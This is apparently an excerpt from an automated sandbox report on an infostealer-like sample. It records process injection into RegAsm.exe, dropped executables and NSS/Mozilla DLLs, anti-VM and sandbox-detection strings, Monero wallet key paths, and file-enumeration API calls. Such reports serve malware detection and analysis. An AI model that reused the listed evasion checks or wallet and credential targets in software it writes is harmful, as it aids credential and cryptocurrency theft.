Source:	Binary string: mozglue.pdb source: file.exe, 00000000.00000002.2170671560.0000000004745000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2710203161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, mozglue.dll.3.dr
Source:	Binary string: c:\rje\tg\30p0ko7\obj\Release\ojc.pdbXRVnRV `RV_CorExeMainmscoree.dll source: JKFIDGDHJE.exe.3.dr
Source:	Binary string: softokn3.pdb source: file.exe, 00000000.00000002.2170671560.0000000004745000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2710203161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, softokn3.dll.3.dr
Source:	Binary string: c:\rje\tg\30p0ko7\obj\Release\ojc.pdb source: JKFIDGDHJE.exe.3.dr
Source:	Binary string: c:\rje\tg\zto9\obj\Release\ojc.pdb source: GCGHJEBGHJ.exe.3.dr, 66f75feece638_ldmg[1].exe.3.dr
Source:	Binary string: c:\rje\tg\zto9\obj\Release\ojc.pdbX source: GCGHJEBGHJ.exe.3.dr, 66f75feece638_ldmg[1].exe.3.dr

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_0041884E GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

3_2_0041884E

Source: freebl3.dll.3.dr	Static PE information: section name: .00cfg
Source: mozglue.dll.3.dr	Static PE information: section name: .00cfg
Source: msvcp140.dll.3.dr	Static PE information: section name: .didat
Source: softokn3.dll.3.dr	Static PE information: section name: .00cfg
Source: nss3.dll.3.dr	Static PE information: section name: .00cfg

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_037425B1 push eax; retn 0071h	0_2_037425B2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0042F042 push ecx; ret	3_2_0042F055
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0041DCB5 push ecx; ret	3_2_0041DCC8
Source: C:\ProgramData\GCGHJEBGHJ.exe	Code function: 8_2_029A259D push eax; retn 0071h	8_2_029A259E
Source: C:\ProgramData\JKFIDGDHJE.exe	Code function: 19_2_0356259D push eax; retn 0071h	19_2_0356259E

Source: GCGHJEBGHJ.exe.3.dr	Static PE information: section name: .text entropy: 7.995305525135828
Source: 66f75feece638_ldmg[1].exe.3.dr	Static PE information: section name: .text entropy: 7.995305525135828

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\IJKFHDBKFCAA\mozglue.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\JKFIDGDHJE.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\IJKFHDBKFCAA\msvcp140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\IJKFHDBKFCAA\softokn3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\GCGHJEBGHJ.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\66f75feece638_ldmg[1].exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\IJKFHDBKFCAA\freebl3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\IJKFHDBKFCAA\vcruntime140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\66f75fd9dc673_vasd[1].exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\IJKFHDBKFCAA\nss3.dll	Jump to dropped file

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\IJKFHDBKFCAA\mozglue.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\JKFIDGDHJE.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\IJKFHDBKFCAA\msvcp140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\IJKFHDBKFCAA\softokn3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\GCGHJEBGHJ.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\IJKFHDBKFCAA\freebl3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\IJKFHDBKFCAA\vcruntime140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\IJKFHDBKFCAA\nss3.dll	Jump to dropped file

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

3_2_0041884E

Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\GCGHJEBGHJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\GCGHJEBGHJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\GCGHJEBGHJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\GCGHJEBGHJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\GCGHJEBGHJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\GCGHJEBGHJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\GCGHJEBGHJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\GCGHJEBGHJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\GCGHJEBGHJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\GCGHJEBGHJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\GCGHJEBGHJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\GCGHJEBGHJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\GCGHJEBGHJ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\ProgramData\JKFIDGDHJE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\JKFIDGDHJE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\JKFIDGDHJE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\JKFIDGDHJE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\JKFIDGDHJE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\JKFIDGDHJE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\JKFIDGDHJE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\JKFIDGDHJE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\JKFIDGDHJE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\JKFIDGDHJE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\JKFIDGDHJE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\JKFIDGDHJE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\JKFIDGDHJE.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: 19.2.JKFIDGDHJE.exe.4565570.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.4745570.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.4745570.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000013.00000002.2710042416.000000000459E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.2971207252.000000000043A000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2710203161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2170671560.0000000004745000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 6900, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 7152, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 2656, type: MEMORYSTR

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: RegAsm.exe	Binary or memory string: DIR_WATCH.DLL
Source: RegAsm.exe	Binary or memory string: SBIEDLL.DLL
Source: RegAsm.exe, 00000003.00000002.2710203161.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: INMPM20IXQUGN9:-?5(\C!7%{->^WALLET_PATHSOFTWARE\MONERO-PROJECT\MONERO-CORE.KEYS\MONERO\WALLET.KEYS\\\.\\...\\\\\\\\\\\\HAL9THJOHNDOEDISPLAYAVGHOOKX.DLLAVGHOOKA.DLLSNXHK.DLLSBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLLCMDVRT32.DLLCMDVRT64.DLL04:22:2404:22:2404:22:2404:22:2404:22:2404:22:24DELAYS.TMP%S%SNTDLL.DLL
Source: RegAsm.exe	Binary or memory string: API_LOG.DLL
Source: RegAsm.exe, 0000001D.00000002.2971207252.000000000043A000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: INMPM20IXQUGN9:-?5(\C!7%{->^WALLET_PATHSOFTWARE\MONERO-PROJECT\MONERO-CORE.KEYS\MONERO\WALLET.KEYS\\\.\\...\\\\\\\\\\\\HAL9THJOHNDOEDISPLAYAVGHOOKX.DLLAVGHOOKA.DLLSNXHK.DLLSBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLLCMDVRT32.DLLCMDVRT64.DLL19:52:0319:52:0319:52:0319:52:0319:52:0319:52:03DELAYS.TMP%S%SNTDLL.DLL

Source: C:\Users\user\Desktop\file.exe	Memory allocated: 1C20000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory allocated: 3740000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory allocated: 3550000 memory reserve \| memory write watch	Jump to behavior
Source: C:\ProgramData\GCGHJEBGHJ.exe	Memory allocated: EB0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\ProgramData\GCGHJEBGHJ.exe	Memory allocated: 29A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\ProgramData\GCGHJEBGHJ.exe	Memory allocated: 49A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\ProgramData\JKFIDGDHJE.exe	Memory allocated: 3340000 memory reserve \| memory write watch	Jump to behavior
Source: C:\ProgramData\JKFIDGDHJE.exe	Memory allocated: 3560000 memory reserve \| memory write watch	Jump to behavior
Source: C:\ProgramData\JKFIDGDHJE.exe	Memory allocated: 34B0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\ProgramData\GCGHJEBGHJ.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\ProgramData\JKFIDGDHJE.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\ProgramData\IJKFHDBKFCAA\mozglue.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\ProgramData\IJKFHDBKFCAA\msvcp140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\ProgramData\IJKFHDBKFCAA\softokn3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\ProgramData\IJKFHDBKFCAA\freebl3.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\ProgramData\IJKFHDBKFCAA\vcruntime140.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Dropped PE file which has not been started: C:\ProgramData\IJKFHDBKFCAA\nss3.dll	Jump to dropped file

Source: C:\Users\user\Desktop\file.exe TID: 3536	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\ProgramData\GCGHJEBGHJ.exe TID: 3132	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7008	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\ProgramData\JKFIDGDHJE.exe TID: 2364	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe TID: 2328	Thread sleep count: 81 > 30

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_00410DDB GetKeyboardLayoutList followed by cmp: cmp eax, ebx and CTI: jbe 00410EEEh

3_2_00410DDB

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00409D1C FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	3_2_00409D1C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040D5C6 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	3_2_0040D5C6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00401D80 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,FindNextFileA,FindClose,FindNextFileA,FindClose,	3_2_00401D80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00415D9B wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,	3_2_00415D9B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00415207 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,	3_2_00415207
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00414A92 wsprintfA,FindFirstFileA,_memset,_memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,_memset,lstrcatA,strtok_s,strtok_s,_memset,lstrcatA,strtok_s,PathMatchSpecA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,strtok_s,strtok_s,FindNextFileA,FindClose,	3_2_00414A92
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040BF4D FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,	3_2_0040BF4D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_004158D5 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,	3_2_004158D5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040CD37 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,FindNextFileA,FindClose,	3_2_0040CD37
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040B93F FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	3_2_0040B93F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040B5DF FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	3_2_0040B5DF

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_00414F0C GetLogicalDriveStringsA,_memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrlenA,

3_2_00414F0C

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_00410FBA GetSystemInfo,wsprintfA,

3_2_00410FBA

